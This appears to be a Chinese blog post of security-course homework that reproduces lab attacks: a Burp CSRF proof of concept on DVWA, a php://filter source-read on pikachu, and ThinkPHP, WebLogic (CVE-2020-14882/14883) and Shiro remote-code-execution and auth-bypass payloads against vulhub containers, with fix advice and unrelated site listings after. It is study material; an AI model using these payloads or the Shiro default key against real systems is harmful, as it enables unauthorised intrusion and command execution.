C11期作业10(05.01)

原创 已于 2025-05-11 01:51:22 修改 · 850 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2025-05-11 00:49:18 首次发布

目录

一、CSRF

DVWA-High等级

说明

步骤

使用Burp生成CSRF利用POC并实现攻击

对dvwa的csrf页面抓包、生成csrf的poc​编辑​编辑

将此html代码复制到文件中(test.html)

通过浏览器打开test.html,页面很快跳转到dvwa页,可见成功修改了当前账号的密码​编辑

二、SSRF:file_get_content实验,要求获取ssrf.php的源码

说明

靶场:pikachu

知识点

步骤

直接获取文件(参数:?file=php://filter/resource=ssrf.php;可见:展示内容会解析后的内容,如此获取不到源码)​编辑

获取编码后的ssrf.php内容

对编码内容进行解码,得到ssrf.php文件的源码​编辑

源码内容

三、RCE:分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程

ThinkPHP RCE

漏洞概述:漏洞利用条件

影响范围

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示

修复建议

Weblogic  RCE

漏洞概述:漏洞原理

影响范围

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示:CVE-2020-14882

漏洞演示:CVE-2020-14883

修复建议

Shiro  RCE

Shiro反序列化漏洞(CVE-2016-4437、Shiro-550)

漏洞概述

影响范围:Apache Shiro ≤ 1.2.4

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示

修复建议

Shiro权限绕过漏洞(CVE-2020-1957)

漏洞概述

影响范围:Apache Shiro < 1.5.2

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示

修复建议

一、CSRF

  1. DVWA-High等级
    1. 说明
      1. 靶场:dvwa的CSRF页面(修改密码)
      2. high等级:有不确定参数token的验证,不再符合CSRF的条件
      3. 攻击思路:等级可通过cookie修改,请求时可将high等级改为low等级
    2. 步骤
      1. 利用XSS获取被攻击用户的cookie
      2. 模拟被攻击用户修改密码:使用burp抓包,改包(cookie+low),提交,修改密码成功(实际攻击中,会通过表单自动提交来实现)
  2. 使用Burp生成CSRF利用POC并实现攻击
    1. 对dvwa的csrf页面抓包、生成csrf的poc
    2. 将此html代码复制到文件中(test.html)
      <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://ip:port/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="123" />
      <input type="hidden" name="password&#95;conf" value="123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
    3. 通过浏览器打开test.html,页面很快跳转到dvwa页,可见成功修改了当前账号的密码

二、SSRF:file_get_content实验,要求获取ssrf.php的源码

  1. 说明
    1. 靶场:pikachu
    2. 知识点
      1. file_get_contents() 函数的作用是把整个文件读入一个字符串中
      2. php://filter:可以在访问数据流之前进行「过滤」,并指定过滤方式,用于对来自非安全来源的数据(比如用户输入)进行验证和过滤
      3. php://filter的两个参数
        1. resource=<要过滤的数据流>:这个参数是必须的。它指定了你要筛选过滤的数据流,即要读的文件
        2. read=<读链的筛选列表>:该参数可选。可以设定一个或多个过滤器名称,以管道符( | )分隔
  2. 步骤
    1. 直接获取文件(参数:?file=php://filter/resource=ssrf.php;可见:展示内容会解析后的内容,如此获取不到源码)
    2. 获取编码后的ssrf.php内容
      1.url参数
?file=php://filter/read=convert.base64-encode/resource=ssrf.php


2.编码后的内容:
  PD9waHAKLyoqCiAqIENyZWF0ZWQgYnkgcnVubmVyLmhhbgogKiBUaGVyZSBpcyBub3RoaW5nIG5ldyB1bmRlciB0aGUgc3VuCiAqLwoKCiRTRUxGX1BBR0UgPSBzdWJzdHIoJF9TRVJWRVJbJ1BIUF9TRUxGJ10sc3RycnBvcygkX1NFUlZFUlsnUEhQX1NFTEYnXSwnLycpKzEpOwoKaWYgKCRTRUxGX1BBR0UgPSAic3NyZi5waHAiKXsKICAgICRBQ1RJVkUgPSBhcnJheSgnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnYWN0aXZlIG9wZW4nLCdhY3RpdmUnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnKTsKfQoKJFBJS0FfUk9PVF9ESVIgPSAgIi4uLy4uLyI7CmluY2x1ZGVfb25jZSAkUElLQV9ST09UX0RJUi4naGVhZGVyLnBocCc7CgoKCgoKCj8+CgoKPGRpdiBjbGFzcz0ibWFpbi1jb250ZW50Ij4KICAgIDxkaXYgY2xhc3M9Im1haW4tY29udGVudC1pbm5lciI+CiAgICAgICAgPGRpdiBjbGFzcz0iYnJlYWRjcnVtYnMgYWNlLXNhdmUtc3RhdGUiIGlkPSJicmVhZGNydW1icyI+CiAgICAgICAgICAgIDx1bCBjbGFzcz0iYnJlYWRjcnVtYiI+CiAgICAgICAgICAgICAgICA8bGk+CiAgICAgICAgICAgICAgICAgICAgPGkgY2xhc3M9ImFjZS1pY29uIGZhIGZhLWhvbWUgaG9tZS1pY29uIj48L2k+CiAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0ic3NyZi5waHAiPjwvYT4KICAgICAgICAgICAgICAgIDwvbGk+CiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImFjdGl2ZSI+5qaC6L+wPC9saT4KICAgICAgICAgICAgPC91bD4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJwYWdlLWNvbnRlbnQiPgoKICAgICAgICAgPGI+U1NSRihTZXJ2ZXItU2lkZSBSZXF1ZXN0IEZvcmdlcnk65pyN5Yqh5Zmo56uv6K+35rGC5Lyq6YCgKTwvYj4KICAgICAgICAgPHA+5YW25b2i5oiQ55qE5Y6f5Zug5aSn6YO95piv55Sx5LqO5pyN5Yqh56uvPGI+5o+Q5L6b5LqG5LuO5YW25LuW5pyN5Yqh5Zmo5bqU55So6I635Y+W5pWw5o2u55qE5Yqf6IO9PC9iPizkvYblj4jmsqHmnInlr7nnm67moIflnLDlnYDlgZrkuKXmoLzov4fmu6TkuI7pmZDliLY8L3A+CiAgICAgICAgICAgIOWvvOiHtOaUu+WHu+iAheWPr+S7peS8oOWFpeS7u+aEj+eahOWcsOWdgOadpeiuqeWQjuerr+acjeWKoeWZqOWvueWFtuWPkei1t+ivt+axgizlubbov5Tlm57lr7nor6Xnm67moIflnLDlnYDor7fmsYLnmoTmlbDmja48YnI+CiAgICAgICAgICAgIDxicj4KICAgICAgICAgICAg5pWw5o2u5rWBOuaUu+WHu+iAhS0tLS0tPuacjeWKoeWZqC0tLS0+55uu5qCH5Zyw5Z2APGJyPgogICAgICAgICAgICA8YnI+CiAgICAgICAgICAgIOagueaNruWQjuWPsOS9v+eUqOeahOWHveaVsOeahOS4jeWQjCzlr7nlupTnmoTlvbHlk43lkozliKnnlKjmlrnms5Xlj4jmnInkuI3kuIDmoLcKICAgICAgICAgICAgPHByZSBzdHlsZT0id2lkdGg6IDUwMHB4OyI+ClBIUOS4reS4i+mdouWHveaVsOeahOS9v+eUqOS4jeW9k+S8muWvvOiHtFNTUkY6CmZpbGVfZ2V0X2NvbnRlbnRzKCkKZnNvY2tvcGVuKCkKY3VybF9leGVjKCkKICAgICAgICAgICAgPC9wcmU+PGJyPgogICAgICAgICAgICDlpoLmnpzkuIDlrpropoHpgJrov4flkI7lj7DmnI3liqHlmajov5znqIvljrvlr7nnlKjmiLfmjIflrpooIuaIluiAhemihOWfi+WcqOWJjeerr+eahOivt+axgiIp55qE5Zyw5Z2A6L+b6KGM6LWE5rqQ6K+35rGCLDxiPuWImeivt+WBmuWlveebruagh+WcsOWdgOeahOi/h+a7pDwvYj7jgIIKPGJyPgogICAgICAgICAgICA8YnI+CgogICAgICAgICAgICDkvaDlj6/ku6XmoLnmja4iU1NSRiLph4zpnaLnmoTpobnnm67mnaXmkJ7mh4Lpl67popjnmoTljp/lm6AKCiAgICAgICAgPC9kaXY+PCEtLSAvLnBhZ2UtY29udGVudCAtLT4KICAgIDwvZGl2Pgo8L2Rpdj48IS0tIC8ubWFpbi1jb250ZW50IC0tPgoKCgo8P3BocAppbmNsdWRlX29uY2UgJFBJS0FfUk9PVF9ESVIgLiAnZm9vdGVyLnBocCc7Cgo/Pgo=
    3. 对编码内容进行解码,得到ssrf.php文件的源码
    4. 源码内容
      <?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "ssrf.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR.'header.php';






?>


<div class="main-content">
    <div class="main-content-inner">
        <div class="breadcrumbs ace-save-state" id="breadcrumbs">
            <ul class="breadcrumb">
                <li>
                    <i class="ace-icon fa fa-home home-icon"></i>
                    <a href="ssrf.php"></a>
                </li>
                <li class="active">概述</li>
            </ul>
        </div>
        <div class="page-content">

         <b>SSRF(Server-Side Request Forgery:服务器端请求伪造)</b>
         <p>其形成的原因大都是由于服务端<b>提供了从其他服务器应用获取数据的功能</b>,但又没有对目标地址做严格过滤与限制</p>
            导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据<br>
            <br>
            数据流:攻击者----->服务器---->目标地址<br>
            <br>
            根据后台使用的函数的不同,对应的影响和利用方法又有不一样
            <pre style="width: 500px;">
PHP中下面函数的使用不当会导致SSRF:
file_get_contents()
fsockopen()
curl_exec()
            </pre><br>
            如果一定要通过后台服务器远程去对用户指定("或者预埋在前端的请求")的地址进行资源请求,<b>则请做好目标地址的过滤</b>。
<br>
            <br>

            你可以根据"SSRF"里面的项目来搞懂问题的原因

        </div><!-- /.page-content -->
    </div>
</div><!-- /.main-content -->



<?php
include_once $PIKA_ROOT_DIR . 'footer.php';

?>

三、RCE:分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程

  1. ThinkPHP RCE
    1. 漏洞概述:漏洞利用条件
      1. register_argc_argv = on
      2. 知道pearcmd.php路径
      3. 安装pear库
      4. 多语言特性开启
    2. 影响范围
      1. 6.0.1 < ThinkPHP ≤ 6.0.13
      2. 5.1.0 < ThinkPHP ≤ 5.1.8
      3. 5.0.0 < ThinkPHP ≤ 5.0.12
    3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
      1. docker pull vulfocus/thinkphp:6.0.12
      2. docker run -d -p 8080:80 vulfocus/thinkphp:6.0.12
      3. 浏览器访问:http://your_ip:8080/public/
    4. 漏洞演示
      1. 通过burp请求(在浏览器请求会存在url编码问题) 
        /public/?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=phpinfo()?>+/var/www/html/info.php
      2. 访问info.php
    5. 修复建议
      1. 若无必要,可关闭多语言特性
      2. 升级至最新版本
  2. Weblogic  RCE
    1. 漏洞概述:漏洞原理
      1. CVE-2020-14882:允许未授权的用户绕过管理控制台的权限验证访问后台
      2. CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令
      3. 这两个漏洞的组合利用,可以让攻击者以未授权的身份登录后台,然后通过GET请求在Weblogic服务器上远程执行命令
    2. 影响范围
      1. WebLogic 10.3.6.0.0
      2. WebLogic 12.1.3.0.0
      3. WebLogic 12.2.1.3.0
      4. WebLogic 12.2.1.4.0
      5. WebLogic 14.1.1.0.0
    3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
      1. 安装Docker-compose:yum install -y docker-compose
      2. 下载Vulhub(试了几次才ok):git clone https://github.com/vulhub/vulhub.git
      3. cd vulhub/weblogic/CVE-2020-14882/
      4. 启动容器(可能比较慢):docker compose up -d
    4. 漏洞演示:CVE-2020-14882
      1. 访问以下URL,即可未授权访问到管理后台页面 
        http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
或
http://your-ip:7001/console/images/%252e%252e%252fconsole.portal
      2. 访问后的页面截图(可能需要访问几次才会看到此页面)
      3. 观察该页面可看到通过未授权访问的后台与正常登录的后台相比,由于权限不足,缺少部署等功能,无法安装应用,所以也无法通过部署项目等方式直接获取权限。想要实现服务器RCE,就要借助另外一个漏洞(CVE-2020-14883)
    5. 漏洞演示:CVE-2020-14883
      1. 利用方式一
        1. 构造一个恶意的XML文件(命名为rce.xml) 
          <?xml version="1.0" encoding="UTF-8" ?>
<beans
    xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://www.springframework.org/schema/beans
	http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>
                    <![CDATA[touch /tmp/rce]]>
                </value>
            </list>
        </constructor-arg>
    </bean>
</beans>
        2. 将xml文件保存在Weblogic可以访问到的服务器上(如upload-labs容器),确保打开后正常
        3. 访问如下URL(两处需替换为你的ip),即可让Weblogic加载该恶意XML文件,并执行其中的命令 
          http://your-ip:7001/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
        4. 请求url后的页面(报错无所谓)
        5. 进入容器,可以发现 touch /tmp/rce 已成功执行
        6. 这种利用方法的不足之处,就是需要Weblogic服务器能够访问到恶意XML,如果是内网服务器则还需要考虑突破网络限制的问题
      2. 利用方式二
        1. 通过 com.tangosol.coherence.mvel2.sh.ShellSession 类实现,这个利用方法只能在 Weblogic12.2.1 以上版本利用,因为 10.3.6(上面受影响版本中只有这一个低于12.2.1)版本没有这个类
        2. 直接访问如下URL(需替换为你的ip),即可执行命令 
          http://your-ip:7001/console/images/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java
.lang.Runtime.getRuntime().exec('touch%20/tmp/rce2');")
        3. 进入容器,可以发现 touch /tmp/rce2已成功执行
    6. 修复建议
      1. 若无必要,可选择关闭console
      2. 升级至最新版本
  3. Shiro  RCE
    1. Shiro反序列化漏洞(CVE-2016-4437、Shiro-550)
      1. 漏洞概述
        1. 在Apache Shiro的框架中,执行身份验证时提供了一个记住密码的功能(RememberMe),如果用户登录时勾选了这个选项,登录后请求数据包中的Cookie字段将会多出一段数据,这一段数据包含了用户的身份信息,是经过加密的
        2. 加密过程:用户信息 --> 序列化 --> AES加密(这一步需要用密钥key) --> Base64编码 --> RememberMeCookie值
        3. 识别身份的时候,服务端需要对Cookie里的RememberMe字段解密。根据加密的顺序,反推解密过程:RememberMe Cookie值 --> Base64解码 --> AES解密 --> 反序列化(未作过滤处理) --> 用户信息
        4. 出问题的点在于:AES加密的密钥Key被硬编码在代码里(默认密钥:kPH+bIxk5D2deZiIxcaaaA==),这就意味着任何人都可以通过源代码拿到AES加密的密钥。因此,如果把用户信息替换成恶意命令,经过序列化、AES加密、Base64编码后,作为Cookie的RememberMe字段发送。服务端接收RememberMe字段进行解码、解密,反序列化等,这一过程未进行过滤,最终造成该漏洞,实现远程命令执行
      2. 影响范围:Apache Shiro ≤ 1.2.4
      3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
        1. cd vulhub/shiro/CVE-2016-4437/
        2. 启动容器(可能有点慢):docker compose up -d
        3. 打开页面
        4. 使用burp验证漏洞存在:账号admin 密码vulhub
      4. 漏洞演示
        1. 使用工具:shiro_attack_2.2
        2. 检测成功
        3. 命令执行:成功
      5. 修复建议
        1. 升级Shiro到最新版本
        2. 自定义AES密钥且不使用硬编码
    2. Shiro权限绕过漏洞(CVE-2020-1957)
      1. 漏洞概述
        1. Apache Shiro 1.5.2之前的版本,由于Shiro拦截器和Web框架拦截器对RequestURI的匹配流程存在差异,导致攻击者通过构造特殊的http请求,可以绕过Shiro的认证,未授权访问敏感路径
        2. 以Spring框架为例。Spring Boot搭配Apache Shiro进行身份验证、权限控制时,利用Spring和ApacheShiro对URL的处理逻辑不同,实现认证绕过和未授权访问
        3. 比如攻击者构造了这样一个路径: /xxx/..;/admin/
          1.  Shiro首先对URL进行处理,读取到;后会进行截断,丢弃/admin/,然后对/xxx/..;查找需要进行权限判断的地方,发现/xxx/..;不需要权限校验,则放行,交由Spring进行处理
          2. Spring通过/xxx/..;/admin/获取到有效路径/admin/,发起请求访问,假如admin是后台地址,则会成功访问后台
      2. 影响范围:Apache Shiro < 1.5.2
      3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
        1. cd vulhub/shiro/CVE-2020-1957/
        2. docker compose up -d
      4. 漏洞演示
        1. 访问 http://your-ip:8080 ,看到靶场首页
        2. 直接请求管理页面 /admin/ ,无法访问,将会被重定向到登录页面(可能有点慢)
        3. 构造恶意请求 /xxx/..;/admin/ ,即可绕过权限校验,访问到管理页面(可能有点慢)
      5. 修复建议
        1. 升级Shiro到最新版本
面试题 05.01. 插入
2301_76145947的博客
10-27 170
LeetCode 面试题 05.01. 插入
sky 05.01笔记
weixin_43369700的博客
03-25 504
在实际情况中,输入信号不为无穷大的斜率导致开关过程中,即0、1切换的瞬间,VDD与GND之间短时间出现一条电流通路,此时两个管子同时导通,即短路功耗。7.nMOS/pMOS管面积越大,MOS管流过的电流越大,速度也更快,驱动能力更强。因为寄存器本身要能正常工作的话,就需要setup time和hold time,D->Q延时已经model在setup time 里面了。8.simulation tool 看波形时,CK端与D端对齐,它是理想的情况,不需要setup,hold time,与实际电路不一样。
05.01 插入
Cigar
11-17 213
原题目 面试题 05.01. 插入 难度简单20收藏分享切换为英文接收动态反馈 插入。给定两个32位的整数N与M,以及表示比特位置的i与j。编写一种方法,将M插入N,使得M从N的第j位开始,到第i位结束。假定从j位到i位足以容纳M,也即若M = 10 011,那么j和i之间至少可容纳5个位。例如,不可能出现j = 3和i = 2的情况,因为第3位和第2位之间放不下M。 示例1: 输入:N = 1024(10000000000), M = 19(10011), i = 2, j = 6 输出:N = 11
LeetCode——面试题 05.01 插入
玄昌盛不会编程
07-26 252
LeetCode——面试题 05.01 插入
05.01 字符串
zzyzxb的博客
07-12 130
字符串
LeetCode 面试题 05.01. 插入
zheliku的博客
09-22 304
位区域,不足之处用 0 补齐。具体插入过程如图所示。会产生 int 范围越界,因此直接赋值为 0 即可。分为 3 个区间:[31, j + 1] 为前缀。(i
C#学习笔记 05.01
qq_39804557的博客
09-16 225
C#学习笔记 04.01 (学习视频来自bilibili的传智播客赵老师基础教学视频) 整完了while循环,就来for循环 个人感觉这个用的更多一点,至少不用担心因为失误把循环写死,而while循环则被用于故意写死的U型暖循环。 for (int i = 0; i < length(这是需要判断的条件); i++(这里完成条件变动)) { 这里面是循环体 } 这个和while的差别,就是不需要总是记得把条件的变化写进循环体里面,就不容易忘。。。 因为本身都是循环,所以说功能上来讲用哪个都能实现,只是
面试题 05.01:插入
菊头蝙蝠的博客
12-09 521
面试题 05.01:插入题目解题方法一:位运算 题目 题目链接 给定两个整型数字 N 与 M,以及表示比特位置的 i 与 j(i <= j,且从 0 位开始计算)。 编写一种方法,使 M 对应的二进制数字插入 N 对应的二进制数字的第 i ~ j 位区域,不足之处用 0 补齐。具体插入过程如图所示。 题目保证从 i 位到 j 位足以容纳 M, 例如: M = 10011,则 i~j 区域至少可容纳 5 位。 示例1: 输入:N = 1024(10000000000), M = 19(10011),
【位运算】05.01插入
wjavadog的博客
08-29 174
插入
05.01初识HBase1
08-03
【初识HBase】 HBase,全称Hadoop Database,是一种构建在Hadoop文件系统(HDFS)之上的分布式列式存储系统。它源于Google的Bigtable论文,旨在解决大数据量场景下的数据存储和检索问题。HBase不同于传统的关系型...
CH05.01-同态加密1
08-03
同态加密是一种高级的加密技术,它允许对加密数据进行计算,而无需先解密数据。这一特性使得数据在保持加密状态的同时,可以进行各种计算操作,极大地提升了数据的安全性和隐私保护水平。在云存储和大数据分析的背景...
HydrogenCms(采用MVC开发) 2008.06.05.01_hydrogencms.2008.06.05.01.zip
12-18
在这款2008.06.05.01版本的HydrogenCms中,我们可以待找到以下几个关键知识点: 1. **MVC模式**:MVC模式的核心思想是分离关注点,将数据模型、视图展示和控制器逻辑分开。模型负责管理应用程序的数据和业务逻辑...
S05.01-Exercise-AsyncTaskLoader.rar
07-14
标题"S05.01-Exercise-AsyncTaskLoader.rar"暗示了这个压缩包可能包含一个Android开发相关的练习项目,重点是使用AsyncTaskLoader。在Android应用程序中,异步加载数据是一项核心任务,尤其是在处理大数据或者网络...
linux解压tulip_v05.01.10_20180928patch_20230427.tar.gz命令
06-05
用户提到的文件是"tulip_v05.01.10_20180928patch_20230427.tar.gz"。这是一个带有.tar.gz扩展名的文件,表明是经过tar和gzip压缩的档案文件。在Linux中,解压.tar.gz文件的常用命令是使用`tar`命令。标准的解压命令...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8810
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
超声谐波成像中幅度调制聚焦超声引起的全场位移和应变的分析模型(Matlab代码实现)
11-06
内容概要:本文档是一份关于“超声谐波成像中幅超声谐波成像中幅度调制聚焦超声引起的全场位移和应变的分析模型(Matlab代码实现)度调制聚焦超声引起的全场位移和应变的分析模型”的Matlab代码实现研究资料,重点构建了一个用于分析在超声谐波成像过程中,由幅度调制聚焦超声所引发的生物组织全场位移与应变的数学模型。该模型通过Matlab仿真手段实现了对声场激励下组织力学响应的精确计算与可视化,有助于深入理解超声激励与组织变形之间的物理机制,提升超声弹性成像的精度与可靠性。文档还附带多个相关科研领域的Matlab/Simulink代码实例,涵盖无人机控制、路径规划、电力系统仿真、信号处理、机器学习等多个方向,展示了强大的技术支撑与应用拓展能力。; 适合人群:具备Matlab编程基础,从事医学超声成像、生物力学建模、信号与图像处理等相关领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①用于超声弹性成像中组织力学响应的仿真与分析;②为开发新型超声诊断技术提供理论模型与算法支持;③作为多物理场耦合仿真的教学与研究案例,促进跨学科技术融合。; 阅读建议:建议读者结合Matlab代码逐行理解模型实现细节,重点关注声场建模、组织力学方程求解及位移应变后处理部分。同时可参考文档中提供的其他仿真案例,拓宽研究思路,提升综合科研能力。
金融智能基于DQN的股票价格预测系统:MATLAB实现多因子融合与GUI可视化量化交易模型 MATLAB实现基于深度Q网络(DQN)进行股票价格预测的详细项目实例(含完整的程序,GUI设计和代码详
11-06
内容概要:本文详细介绍了一个基于深度Q网络(DQN)的股票价格预测项目,利用MATLAB实现强化学习在金融领域的应用。项目涵盖了从数据预处理、状态与动作空间设计、奖励函数构建,到深度神经网络搭建、经验回放与目标网络机制等DQN核心组件的完整实现。同时,项目集成了GUI可视化界面,支持数据导入、参数设置、模型训练、智能预测与结果评估等功能,提供多维度策略分析,如累计收益、最大回撤、信号精度等,并具备实盘部署潜力。项目强调模型稳定性、风险控制与可解释性,适用于量化投资、智能投顾、金融教学等多个场景。; 适合人群:具备一定编程基础和金融知识背景的研发人员、量化分析师、金融工程或人工智能专业学生,以及对智能投资系统开发感兴趣的从业者。; 使用场景及目标:①学习并实践深度强化学习在股票预测中的建模方法;②构建可复现的量化交易策略原型;③开发具备可视化交互功能的智能投研工具;④用于高校教学、算法竞赛或科研实验平台。; 阅读建议:建议结合MATLAB代码与文档逐步调试运行,重点关注状态构建、奖励函数设计与训练流程逻辑,同时通过GUI界面观察模型输出结果,深入理解DQN在金融决策中的实际表现与优化方向。
基于SpringBoot的高校餐饮档口管理系统的设计与实现【附万字论文+PPT+包部署+录制讲解视频】.zip
最新发布
11-06
标题基于SpringBoot的高校餐饮档口管理系统设计与实现AI更换标题第1章引言介绍高校餐饮档口管理系统的研究背景、意义、国内外现状及论文方法与创新点。1.1研究背景与意义阐述高校餐饮档口管理现状及系统开发的重要性。1.2国内外研究现状分析国内外高校餐饮管理系统的研究与应用进展。1.3研究方法及创新点概述本文采用的研究方法及系统设计的创新之处。第2章相关理论总结与高校餐饮档口管理系统相关的现有理论。2.1SpringBoot框架理论阐述SpringBoot框架的原理、优势及其在Web开发中的应用。2.2数据库设计理论介绍数据库设计的基本原则、方法和步骤。2.3系统安全理论讨论系统安全设计的重要性及常见安全措施。第3章系统需求分析对高校餐饮档口管理系统的功能需求、性能需求等进行详细分析。3.1功能需求分析列举系统需实现的主要功能,如档口管理、订单处理等。3.2性能需求分析分析系统对响应时间、并发处理能力等性能指标的要求。3.3非功能需求分析阐述系统对易用性、可维护性等非功能方面的需求。第4章系统设计详细描述高校餐饮档口管理系统的设计过程。4.1系统架构设计给出系统的整体架构,包括前端、后端和数据库的设计。4.2模块设计详细介绍各个功能模块的设计,如用户管理、档口信息管理等。4.3数据库设计阐述数据库表结构的设计、数据关系及索引优化等。第5章系统实现与测试介绍高校餐饮档口管理系统的实现过程及测试方法。5.1系统实现系统各模块的具体实现过程,包括代码编写和调试。5.2系统测试方法介绍系统测试的方法、测试用例设计及测试环境搭建。5.3系统测试结果与分析从功能、性能等方面对系统测试结果进行详细分析。第6章结论与展望总结本文的研究成果,并展望未来的研究方向。6.1研究结论概括高校餐饮档口管理系统的设计与实现成果。6.2展望指出系统存在的不足及未来改进和扩展的方向。
基于MFCC参数和SVM从测试样本中匹配出最相似的著名歌手.zip
11-06
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、末大作业和毕业设计。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值